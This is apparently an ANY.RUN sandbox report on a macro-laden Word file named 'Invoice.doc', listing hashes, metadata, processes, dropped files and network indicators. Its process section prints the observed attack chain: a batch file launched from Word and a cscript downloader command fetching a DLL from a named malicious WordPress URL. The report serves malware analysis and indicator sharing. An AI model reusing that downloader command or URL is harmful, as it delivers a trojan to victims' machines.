analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice.doc

Full analysis: https://app.any.run/tasks/a64a8a5b-273f-4375-b69a-e7d4fa799f75
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: March 30, 2020, 19:54:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

92826793628D5D2F1D4CC7C304289B7F

SHA1:

72C8B24336C8D0C6180E1DF9B11EDE455C264465

SHA256:

73C199BC870AB86003D3184D56140534FC90F245A0866C11AC8992F4C9C048F5

SSDEEP:

3072:4VDHhd5A6trmYodxLrOa5nctJTDS+qMWucre+IA:4DBdNtrmxxLrO0nUJTDJ7j+f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3424)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3424)
  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 1348)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3424)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3424)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: 11 minutes
Template: Normal
ModifyDate: 2020:03:29 20:05:00Z
CreateDate: 2020:03:28 04:59:00Z
RevisionNumber: 5
LastModifiedBy: fjqowisuqwodi
Keywords: -

XMP

Description: -
Creator: user
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1503
ZipCompressedSize: 399
ZipCRC: 0x3f450766
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
3424"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice.doc.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1348cmd /c c:\InstallShield\scrpt.batC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3524cscript //nologo c:\InstallShield\Shield18.vbs http://restorefutureschool.com/wp-includes/customize/class-wp-customize-partial.dll C:\InstallShield\vShield.dllC:\Windows\system32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
1
Version:
5.8.7600.16385
Total events
2 044
Read events
945
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
193
Unknown types
3

Dropped files

PID
Process
Filename
Type
3424WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6903.tmp.cvr
MD5:
SHA256:
1348cmd.exeC:\InstallShield\Shield18.vbstext
MD5:0E3D96BE339A9115C9206C2156C31F02
SHA256:E76E78A44FBD4403511C5A05603EFF09329603CE2FE063A58D158EF60448AE96
3424WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:E818FA64250B3E4C4F2760D5A788660B
SHA256:B730D69715CB759C0DCC3F22271346A9200164B4D3A411DA8ECE14E0C70C4978
3424WINWORD.EXEC:\InstallShield\scrpt.battext
MD5:76446D2AE893FA77B6443BBDB99492FC
SHA256:7A8E4C8D6FA6468421AA6038C201ABD4B8E140C38CC3647D2BF931F31B7C610F
3424WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice.doc.docmpgc
MD5:FC98CAEEC23CF4F8838287B8EF155FA8
SHA256:765A37083F1BF3940B1CE523D8B05F175618C5454B6D92568DF5F6BCE9F3AC70
3424WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:590D78103669C3F8759447C7133CDAE6
SHA256:4CB23FAB6EBDE683F9623E0BAD5BEE137093A02D33867372542B117700C30084
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3524
cscript.exe
GET
301
198.187.29.233:80
http://restorefutureschool.com/wp-includes/customize/class-wp-customize-partial.dll
US
html
292 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
198.187.29.233:443
restorefutureschool.com
Namecheap, Inc.
US
malicious
3524
cscript.exe
198.187.29.233:443
restorefutureschool.com
Namecheap, Inc.
US
malicious
3524
cscript.exe
198.187.29.233:80
restorefutureschool.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
restorefutureschool.com
  • 198.187.29.233
malicious

Threats

PID
Process
Class
Message
3524
cscript.exe
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
3524
cscript.exe
Potentially Bad Traffic
ET INFO TLS Handshake Failure
No debug info